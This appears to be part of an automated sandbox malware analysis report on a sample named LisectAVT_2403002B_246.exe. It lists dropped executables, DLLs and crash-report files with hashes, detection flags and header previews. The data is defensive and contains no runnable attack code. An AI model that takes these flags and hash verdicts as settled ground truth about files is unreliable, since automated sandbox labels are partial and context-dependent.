                                                        C:\Program Files (x86)\Everything\msvcp120.dllLisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                          LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                            LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                              LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                                3vS3F5eukR.exeGet hashmaliciousUnknownBrowse
                                                                  3vS3F5eukR.exeGet hashmaliciousUnknownBrowse
                                                                    eWIIsxIoe5.exeGet hashmaliciousUnknownBrowse
                                                                      eWIIsxIoe5.exeGet hashmaliciousUnknownBrowse
                                                                        CloudInstaller.zipGet hashmaliciousUnknownBrowse
                                                                          lookworldafs1244.msiGet hashmaliciousUnknownBrowse
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):477
                                                                            Entropy (8bit):5.654004064684553
                                                                            Encrypted:false
                                                                            SSDEEP:12:TM3iu5vw5puA9WZSEprCADmQWpUeb/XOaGUPUG/zHkojXbv:qV5o5pV4prCsWpUeb/++UukorL
                                                                            MD5:B07505384106D6DCCD5178D888116A7E
                                                                            SHA1:4FFE1C9E180EE42A5BDCA3C8F8A38AEC75F2A99C
                                                                            SHA-256:FF934B9DB5A3BFB40B9575EE0A94AB5F8E2134816DBF1DE39F2AFDEB27CC5916
                                                                            SHA-512:B913673A6FDBC840B1D25C142DE1B6C269E75E905529F34C7CEF75F5116953F48F0B17036C447B42F82042A7F385DC169737B1CD1D56923E5D92F1D20929F1A2
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>UnavailableForLegalReasons</Code>..<Message>Due to your account is arrears, it is unavailable until you recharge.</Message>..<Resource>/qd.bin</Resource>..<RequestId>NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMzMxYjdi</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MmIzZjU5NDVmMTI0ZDFhMTNhODBhOTVmZmJiYzEyNzA=</TraceId>.</Error>..
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):22920
                                                                            Entropy (8bit):6.723474063606494
                                                                            Encrypted:false
                                                                            SSDEEP:384:29BXkFiGvkOpAxufYw41MgDGlBAM+o/8E9VF0NyMCy:29B0FiSkArQw2MgDGLAMxkE2
                                                                            MD5:94079169014ABCE2F6D26677897D3CA1
                                                                            SHA1:F9CF7C2A0A41E97998BBAF47954CBA3024DA9E84
                                                                            SHA-256:F5D3846B670FC95F3D33CF29E7BE1692FF09F09F5D2E8C2DACF271AA00F4A5A3
                                                                            SHA-512:749DDB94153DF2D0A506D1EAE2CA38BAD3167560D3312958C10B9C3554086D3CB95B1CBC88B504740B394A82FD1491924FE899775A027363C426C052A333F579
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n|.Q*.@.*.@.*.@.#e.. .@..CA.(.@..CC.+.@..CE.8.@..CD.'.@....(.@..CA.).@.*.A...@..CI.+.@..C..+.@..CB.+.@.Rich*.@.........................PE..L......e..........".................I........ ....@..........................p.......%....@.................................,%.......P...............&...3...`..<....!..p...........................p!..@............ ...............................text............................... ..`.rdata..p.... ......................@..@.data........0......................@....gfids.. ....@......................@..@.rsrc........P....... ..............@..@.reloc..<....`.......$..............@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):10240
                                                                            Entropy (8bit):5.202221702110796
                                                                            Encrypted:false
                                                                            SSDEEP:192:Y2lzYEX2FnZjzG8jWJjFjOLd3MzCp4HFWRfB:7REzYJjFjCdQCpcW
                                                                            MD5:5E4ED4C5E1053D9C6CCA98C0391FAFBD
                                                                            SHA1:C79993C05F66268279F56FC07A11B925527808EC
                                                                            SHA-256:033750A55FAE1731AE8503E84BEC35671ECD996B6CEDB8515DEE2272D9E038AB
                                                                            SHA-512:871914B26E88F48103FBF769FE49B2017DE07F50F5510D23B1A99066CDE6481CB7A73A7D8DFD672DF62A22AF18F1AF46CF9FF7DFC2CE53F5E52C41A8C7F432BE
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._..O1.O1.O1.7..O1.s.0.O1.s.4.O1.s.5.O1.s.2.O1..70.O1.O0.O1.^.8.O1.^...O1.^.3.O1.Rich.O1.........PE..L....s.e...........!...'..................... ...............................p............@..................................5..d....P.......................`..T....1..p............................0..@............0...............................text...{........................... ..`.bss....x.... ...........................rdata..:....0......................@..@.data...q....@......................@....rsrc........P.......$..............@..@.reloc..T....`.......&..............@..B................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):455328
                                                                            Entropy (8bit):6.698367093574994
                                                                            Encrypted:false
                                                                            SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                            MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                            SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                            SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                            SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                            Malicious:false
                                                                            Joe Sandbox View:
                                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                                            • Filename: 3vS3F5eukR.exe, Detection: malicious, Browse
                                                                            • Filename: 3vS3F5eukR.exe, Detection: malicious, Browse
                                                                            • Filename: eWIIsxIoe5.exe, Detection: malicious, Browse
                                                                            • Filename: eWIIsxIoe5.exe, Detection: malicious, Browse
                                                                            • Filename: CloudInstaller.zip, Detection: malicious, Browse
                                                                            • Filename: lookworldafs1244.msi, Detection: malicious, Browse
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):446840
                                                                            Entropy (8bit):6.690279428020546
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):970912
                                                                            Entropy (8bit):6.9649735952029515
                                                                            Encrypted:false
                                                                            SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                            MD5:034CCADC1C073E4216E9466B720F9849
                                                                            SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                            SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                            SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):91104
                                                                            Entropy (8bit):6.919609919273454
                                                                            Encrypted:false
                                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):1.0158040977185034
                                                                            Encrypted:false
                                                                            SSDEEP:192:az4V0+LQh7yvN0BU//c7jHjn/zuiFWZ24IO8Tp1:3dUy2BU/4jzzuiFWY4IO83
                                                                            MD5:B481FB33A40EE9F566DDA88D76E46025
                                                                            SHA1:3A8AC0EDBFDFE5A5025A16CB3F16283525D90361
                                                                            SHA-256:8ADC6B155220E645F1F4F85A6BA0D0F85351830E096B20BC4BF97BA7F18CE9CA
                                                                            SHA-512:06E98E5E55CA491A4C86C7F7B3E7458F3478AFB13BA67C94BCBACDFDE645FD234774EB5C6F38AFE773E897581A6E2CB513FD571BB2378F20272F2BE097159278
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.8.9.8.8.6.7.7.2.8.9.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.8.9.8.8.8.1.4.7.8.8.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.7.4.7.0.1.3.-.6.e.f.0.-.4.c.c.8.-.9.5.b.f.-.5.9.3.0.3.2.7.5.0.3.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.4.0.4.a.9.9.-.8.0.d.8.-.4.9.5.8.-.a.c.d.f.-.7.a.3.a.0.8.f.f.d.d.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.i.s.e.c.t.A.V.T._.2.4.0.3.0.0.2.B._.2.4.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.0.-.0.0.0.1.-.0.0.1.4.-.e.4.0.f.-.9.6.8.d.9.b.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.f.6.a.3.b.6.4.a.d.c.4.8.8.a.9.0.f.9.d.9.8.9.9.1.6.8.2.3.4.2.9.0.0.0.0.f.f.f.f.!.0.0.0.0.7.e.c.a.9.a.c.a.8.0.2.5.1.2.f.e.3.4.5.f.5.5.b.b.5.a.a.9.6.9.f.3.8.4.f.3.e.9.3.4.!.L.i.s.e.c.t.A.V.T._.2.4.0.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Thu Jul 25 14:04:47 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):125650
                                                                            Entropy (8bit):1.9339133385846927
                                                                            Encrypted:false
                                                                            SSDEEP:384:lXcEsumKiHtrQpCXSMFa7B/qOcwdT4eM4+hfR8OK4aJDEdZAQTApJ:KEHxiHZQpCXSMFWVdcwt4eM4Mjag01pJ
                                                                            MD5:E0752A55056F1C2BE2A2F13C5FF1E424
                                                                            SHA1:92C261863EDFE1B8BBB7ABB8EF951AD425328F2F
                                                                            SHA-256:28E2E8EAAD77C23C5FF1C23728058390C34BB043E7C2F7AFAAB1781697B160CB
                                                                            SHA-512:BA72FA5CC721A7055608CC15E51F6C5426F1F74AC221C23FBD905671818081A308C94F271563639C0A8F59DCF5B01B9EC03A597C92D54E47A2F0F3859A8C8038
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........[.f........................|...........D...rL..........T.......8...........T...........0N...............!...........#..............................................................................eJ.......$......GenuineIntel............T...........g[.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8420
                                                                            Entropy (8bit):3.707754027725112
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJSWE6uu6Y9SSUHn4gmfhRMxprj89bUAsfYkcm:R6lXJ+6X6YISUH4gmfnMoUTfN
                                                                            MD5:671E27D15DEFC7AFBBC132539EEA9554
                                                                            SHA1:3B4B304273B6464ABED07777FEC7011817DB0636
                                                                            SHA-256:E2234CCA808DE17BD20E2DF5076B4E2BBC5967A0C37495FCF6C8A8EA7269C4F4
                                                                            SHA-512:8F8849DBB0BD06CB6AD968EC43C37F20DB682F213034C135AAF0D34C60EFCE3F599AE8B23A4D5B84DF4267CE0B007EDF24B2289D725E63A1983FC388CFA5A1A6
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4679
                                                                            Entropy (8bit):4.523099064302316
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsQJg77aI9VSWpW8VYpYm8M4JS7uF/1X+q8igolyA+7ZlhQd:uIjfWI7Dz7VZJmaDhlyA+1lhQd
                                                                            MD5:74D8C6AF4115DA89F0E41907AEADE542
                                                                            SHA1:98BA3E4A3F89B3619710796DDB2687AABA3A081D
                                                                            SHA-256:BAC683AA604567AFC1E1C65F2B2CBC7A3E98240DD2029199E51F8DED28BA745D
                                                                            SHA-512:F6022CE8A5C9052A1F9D737E3B810D4FE9DE5AC8C324BB1009E6B1509121264321E041DE8F61EA65C36A860DA3BC032706E2131AAB3EEF724422391D4E941AE2
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426547" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):22920
                                                                            Entropy (8bit):6.723474063606494
                                                                            Encrypted:false
                                                                            SSDEEP:384:29BXkFiGvkOpAxufYw41MgDGlBAM+o/8E9VF0NyMCy:29B0FiSkArQw2MgDGLAMxkE2
                                                                            MD5:94079169014ABCE2F6D26677897D3CA1
                                                                            SHA1:F9CF7C2A0A41E97998BBAF47954CBA3024DA9E84
                                                                            SHA-256:F5D3846B670FC95F3D33CF29E7BE1692FF09F09F5D2E8C2DACF271AA00F4A5A3
                                                                            SHA-512:749DDB94153DF2D0A506D1EAE2CA38BAD3167560D3312958C10B9C3554086D3CB95B1CBC88B504740B394A82FD1491924FE899775A027363C426C052A333F579
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n|.Q*.@.*.@.*.@.#e.. .@..CA.(.@..CC.+.@..CE.8.@..CD.'.@....(.@..CA.).@.*.A...@..CI.+.@..C..+.@..CB.+.@.Rich*.@.........................PE..L......e..........".................I........ ....@..........................p.......%....@.................................,%.......P...............&...3...`..<....!..p...........................p!..@............ ...............................text............................... ..`.rdata..p.... ......................@..@.data........0......................@....gfids.. ....@......................@..@.rsrc........P....... ..............@..@.reloc..<....`.......$..............@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):446840
                                                                            Entropy (8bit):6.690279428020546
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):970912
                                                                            Entropy (8bit):6.9649735952029515
                                                                            Encrypted:false
                                                                            SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                            MD5:034CCADC1C073E4216E9466B720F9849
                                                                            SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                            SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                            SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):91104
                                                                            Entropy (8bit):6.919609919273454
                                                                            Encrypted:false
                                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):10240
                                                                            Entropy (8bit):5.202221702110796
                                                                            Encrypted:false
                                                                            SSDEEP:192:Y2lzYEX2FnZjzG8jWJjFjOLd3MzCp4HFWRfB:7REzYJjFjCdQCpcW
                                                                            MD5:5E4ED4C5E1053D9C6CCA98C0391FAFBD
                                                                            SHA1:C79993C05F66268279F56FC07A11B925527808EC
                                                                            SHA-256:033750A55FAE1731AE8503E84BEC35671ECD996B6CEDB8515DEE2272D9E038AB
                                                                            SHA-512:871914B26E88F48103FBF769FE49B2017DE07F50F5510D23B1A99066CDE6481CB7A73A7D8DFD672DF62A22AF18F1AF46CF9FF7DFC2CE53F5E52C41A8C7F432BE
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._..O1.O1.O1.7..O1.s.0.O1.s.4.O1.s.5.O1.s.2.O1..70.O1.O0.O1.^.8.O1.^...O1.^.3.O1.Rich.O1.........PE..L....s.e...........!...'..................... ...............................p............@..................................5..d....P.......................`..T....1..p............................0..@............0...............................text...{........................... ..`.bss....x.... ...........................rdata..:....0......................@..@.data...q....@......................@....rsrc........P.......$..............@..@.reloc..T....`.......&..............@..B................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):455328
                                                                            Entropy (8bit):6.698367093574994
                                                                            Encrypted:false
                                                                            SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                            MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                            SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                            SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                            SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.465540581001569
                                                                            Encrypted:false
